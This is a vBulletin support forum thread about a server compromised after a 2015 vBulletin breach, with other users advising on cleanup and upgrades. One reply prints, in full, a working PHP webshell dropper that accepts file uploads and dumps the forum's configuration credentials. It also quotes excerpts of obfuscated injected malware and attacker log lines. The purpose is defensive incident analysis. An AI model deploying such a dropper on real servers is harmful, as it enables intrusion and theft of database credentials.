Virus Detected on web host.

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • ravensix
    Member
    • May 2015
    • 40
    • 5.1.x

    Virus Detected on web host.

    My web host has detected a virus on the server. The file that they say is a virus "core/vbpatch_v10835.php". Does anyone know if this is a legit file?
  • In Omnibus
    Senior Member
    • Apr 2010
    • 2310

    #2
    Assuming you're operating on vBulletin 5.1.9 Patch Level 1, I have no such file in my vBulletin installation.

    Comment

    • ravensix
      Member
      • May 2015
      • 40
      • 5.1.x

      #3
      I have not upgrade to it yet.

      Comment

      • In Omnibus
        Senior Member
        • Apr 2010
        • 2310

        #4
        Do you have any modifications or add-ons installed? Perhaps the file came from one of them?

        Comment

        • IggyP
          Senior Member
          • Mar 2012
          • 680

          #5
          i dont see it...sounds suspect

          Comment

          • ravensix
            Member
            • May 2015
            • 40
            • 5.1.x

            #6
            Thats what I thinking as well. The only add on I have is Tapatalk at the moment. I have giving access to the vBulletin team to sort some things out. I am wondering if they did something. Waiting to hear from them.

            Comment

            • jon mutiger
              New Member
              • Jul 2008
              • 23
              • 3.7.x

              #7
              Originally posted by ravensix
              My web host has detected a virus on the server. The file that they say is a virus "core/vbpatch_v10835.php". Does anyone know if this is a legit file?
              This is definitely hacked file, your vBulletin has almost certainly been compromised as a result of last week's security issue and not patching fast enough. You need to restore everything (files and database) to a safe backup from before the latest vBulletin security hack.

              Because vBulletin.com itself was hacked and its database compromised (see online news links at the end of this article or VB's password reset announcement), there was a complete list of all vBulletin website URLs that the hackers would have been able to access. This caused a lot of sites to be owned very fast.. I installed the patch just 24 hours after the security announcement and our forum (a small motorcycle club, hardly a high profile target) was already hacked. If you didn't install the patch within 24 hours, your vBulletin is probably owned too.

              These hackers were sophisticated - using a large Russian botnet with hundreds of IP addresses they proceeded to drop malware files all over the codebase, including fake .php files in vBulletin as well as in Wordpress and other PHP applications on the server. In my case it all started with this file, which they dropped on the server Nov 6th 6:39PM pacific time, about 24 hours from the security bulletin's release and just hours before I installed the patch.

              402 Nov 6 18:39 jsrender.php - in forum/core
              /public_html_hacked/forum/core# more jsrender.php
              <?php
              if ((!isset($_REQUEST['pwd'])) || (empty($_REQUEST['pwd'])) || (md5($_REQUEST['pwd'])!='1a52094472487da553df7b35be694127')) die('NULL');
              if (isset($_FILES['js']))
              if (move_uploaded_file($_FILES['js']['tmp_name'],$_FILES['js']['name']))
              echo $_FILES['js']['name'];

              if (isset($_REQUEST['config']))
              {
              include('includes/config.php');
              echo "\n\n<config>".json_encode($config)."</config>\n\n";
              }
              ?>

              this is a a simple file dropper script that was then used to install and hide more malware and eventually start a spam campaign. Here they are using it (they only needed to once):

              188.163.80.234 - - [08/Nov/2015:11:12:49 -0800] "POST /forum/core/jsrender.php HTTP/1.0" 200 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"

              From there they created the following malware files (your malware files may vary though in your installation.. it doesn't matter as the whole codebase is throwaway, there's no way to accurately find all the malware and clean it, these guys know what they are doing). You will note they sneakily changed the dates on the .PHP files to Oct 24th, so it's impossible to just check by date to see which ones have changed. (Oct 24th is the date of when I last updated the vBulletin codebase, so the files hide amongst the other ones in the folder and don't show up as changed).

              4768 Nov 8 11:12 vbpatch_v74862.php - in /forum/core
              This is not a legit VB script, and looking at it confirms it's all obfuscated malware:
              public_html_hacked/forum/core# cat vbpatch_v74862.php
              &lt;?php ${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6b\x64\x71\x79\x65e"]="\x76\x61lue";${"\x47\x4c\x4f\x42\x41L\x53"}["\x77\x62\x71q\x62\x67\x6f"]="\x6b\x65\x79";${"\x47LOB\x41\x4c\x53"}["t\x66\x62\x71\x75\x76\x75"]="\x64\x61\x74a";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x62ba\x6e\x68\x71\x76\x6e\x64k"]="i";${"\x47\x4c\x4fB\x41\x4c\x53"}["e\x77\x76\x74uj\x71f\x73c\x70"]="\x64at\x61";${"\x47LO\x42\x41L\x53"}["\x6fhnb\x68dky\x76"]="\x6f\x75t_d\x61\x74\x61";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6c\x73rir\x78u"]="d\x61\x74\x61\x5fke\x79";${"\x47L\x4f\x42\x41L\x53"}["x\x65\x77\x68\x72\x72\x68"]="\x64\x61\x74\x61"; [ ... etc ... ]

              10938 Oct 24 15:15 error.php - stashed in our wordpress install at /wp-content/themes/Divi/css/error.php, this was used to send out porn spam

              Oct 24 10:35 export.php - in /forum/core/vb/external/
              223.252.30.129 - - [11/Nov/2015:17:27:52 -0800] "POST /forum/core/vb/external/export.php HTTP/1.0" 200 176 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"

              This one was the main spam gateway they used. it's sneaky in that they added code to the top of a real vBulletin file (there is an export.php at that location). The malware code is strange looking and easily to spot:

              public_html_hacked/forum/core/vb/external# more export.php
              &lt;?php
              $GLOBALS['gc45'];global$gc45;$gc45=$GLOBALS;$gc45['yc1b']="\x62\x72\x5e\x47\x6c\x5d\x6a\x30\
              x46\x68\x57\x3f\x54\x64\x63\x5f\x33\x41\x5a\x22\x61\x78\x40\x23\x79\x2b\x49\x20\x2f\x3a\x6 b\x53\x9\x74\x3b\x38\x4b\x4a\x25
              \x6d\x75\x4f\x59\x60\xa\x69\x3d\x45\x36\xd\x2a\x5b\x70\x37\x43\x77\x55\x56\x5c\x39\x7e\x2e \x7d\x2c\x73\x27\x7a\x32\x3c\x34
              \x35\x24\x4c\x71\x6f\x44\x21\x48\x58\x31\x7c\x50\x51\x2d\x66\x65\x52\x26\x29\x67\x7b\x6e\x 76\x28\x4d\x3e\x42\x4e";$gc45[$g
              c45['yc1b'][20].$gc45['yc1b'][70].$gc45['yc1b'][53].$gc45['yc1b'][16].$gc45['yc1b'][59].$gc45['yc1b'][14].$gc45['yc1b'][20
              ].$gc45['yc1b'][70].$gc45['yc1b'][53]]=$gc45['yc1b'][14].$gc45['yc1b'][9].$gc45['yc1b'][1];$gc45[$gc45['yc1b'][14].$gc45['
              yc1b'][69].$gc45['yc1b'][69].$gc45['yc1b'][53]]=$gc45['yc1b'][74].$gc45['yc1b'][1].$gc45['yc1b'][13];$gc45[$gc45['yc1b'][2
              0].$gc45['yc1b'][67].$gc45['yc1b'][79].$gc45['yc1b'][69].$gc45['yc1b'][48].$gc45['yc1b'][13]]=$gc45['yc1b'][64].$gc45['yc1
              b'][33].$gc45['yc1b'][1].$gc45['yc1b'][4].$gc45['yc1b'][85].$gc45['yc1b'][91];$gc45[$gc45['yc1b'][66].$gc45['yc1b'][14].$g
              c45['yc1b'][13].$gc45['yc1b'][79].$gc45['yc1b'][53].$gc45['yc1b'][85]]=$gc45['yc1b'][45].$gc45['yc1b'][91].$gc45['yc1b'][4
              [.. further down the file the regular vBulletin PHP source can be found.]


              In the end, I had to perform a full rebuild: I moved all the web files out of the way and rebuilt a cleanly downloaded PHP codebase for vBulletin (don't forget to patch it!!!) and also for my WordPress install. There IS no way you can reliably tell which files have changed as I mentioned above, these hackers exploiting this in bulk are sophisticated professional criminals and they use very cunning methods to hide their tracks. The only realistic method for recovery is to start fresh with either a backup from before this all happened (ie. pre Nov 8th) or by re-downloading all the vbulletin files again. Do not, under any circumstances, just assume you spotted all the malware and removed it, that will not be enough to keep them out.

              In my case, the spammers tried to send out 80,000 graphic porn spams before I noticed and was able to shut them down. It was one of the more difficult cleanups I've performed, and I do this stuff for a living.

              While I appreciate the rationale behind vBulletin's policy of keeping the info in the locked customer thread, I think it's important they recognize the unusual circumstances here.. namely that the initial compromise of the vB site has provided Russian spammers with a laundry list of sites to attack, which they then did attack within the first 24 hours. More information on detecting hacked activity, specific information on the attack vectors used this last weekend would be helpful information. Requiring customers to be paid up with the latest version to get this information is at best not providing any more security, and at worst gives the (mistaken) impression that VB is taking advantage of this situation as a cash grab, extorting compromised customers into purchasing the latest license in order to ugprade or get information. Insult to injury: there is really no current information to be had on the members only thread, other than mentioning the need to update and referencing 2 year old instructions on how to recover from hacks.

              I urge VB to appreciate the scope of this problem and the unique situation here, and then make more information publicly available, since a great number of people are likely in this situation now. The cat is, after all, already out of the bag as a google news search for "vbulletin hack" shows. https://news.google.com/news/story?n...ved=0CCEQqgIwA
              Last edited by jon mutiger; Thu 12 Nov '15, 10:08am.

              Comment

              • ravensix
                Member
                • May 2015
                • 40
                • 5.1.x

                #8
                Thank you very much for the info.@jon mutiger . This happened on Nov 8th, that is 4 days ago. If I do a backup til then, then I lose 4 days worth of posts. My host stop the file for doing anything as soon as it was uploaded. Do you think it safe to say that I am good or should I really do a clean install of the vb software and use the backup file of the database?

                Comment

                • In Omnibus
                  Senior Member
                  • Apr 2010
                  • 2310

                  #9
                  Jon doesn't know that your problem and his problem are the same problem. He's just guessing. He may be correct but what you need to do first is to check your database for suspect files.

                  AdminCP / Maintenance / Diagnostics / Suspect File Versions

                  Comment

                  • ravensix
                    Member
                    • May 2015
                    • 40
                    • 5.1.x

                    #10
                    How do I know which files are good?

                    Comment

                    • In Omnibus
                      Senior Member
                      • Apr 2010
                      • 2310

                      #11
                      Originally posted by ravensix
                      How do I know which files are good?
                      You'll get an error message for each file that reads "File does not contain suspected contents" or "File is not recognized as part of vBulletin"

                      Comment

                      • Leong
                        Member
                        • Oct 2014
                        • 57
                        • 5.1.x

                        #12
                        Hi, I think my website was hacked too. I am using version 5.1.3... what do your suggest? upgrade to 5.1.9 and do all the latest patch?

                        Comment

                        • IggyP
                          Senior Member
                          • Mar 2012
                          • 680

                          #13
                          would be nice if there was a clean up tool for old files in the upgrade process...

                          i had to clean up a bunch old scripts from older versions of vb5 that were flagged as suspect.

                          guess its a good time to do that tho...

                          Comment

                          • In Omnibus
                            Senior Member
                            • Apr 2010
                            • 2310

                            #14
                            Originally posted by Leong
                            Hi, I think my website was hacked too. I am using version 5.1.3... what do your suggest? upgrade to 5.1.9 and do all the latest patch?
                            Yes. http://www.vbulletin.com/forum/forum...-through-5-1-9

                            Comment

                            • Leong
                              Member
                              • Oct 2014
                              • 57
                              • 5.1.x

                              #15
                              Agree iggy, thanks

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...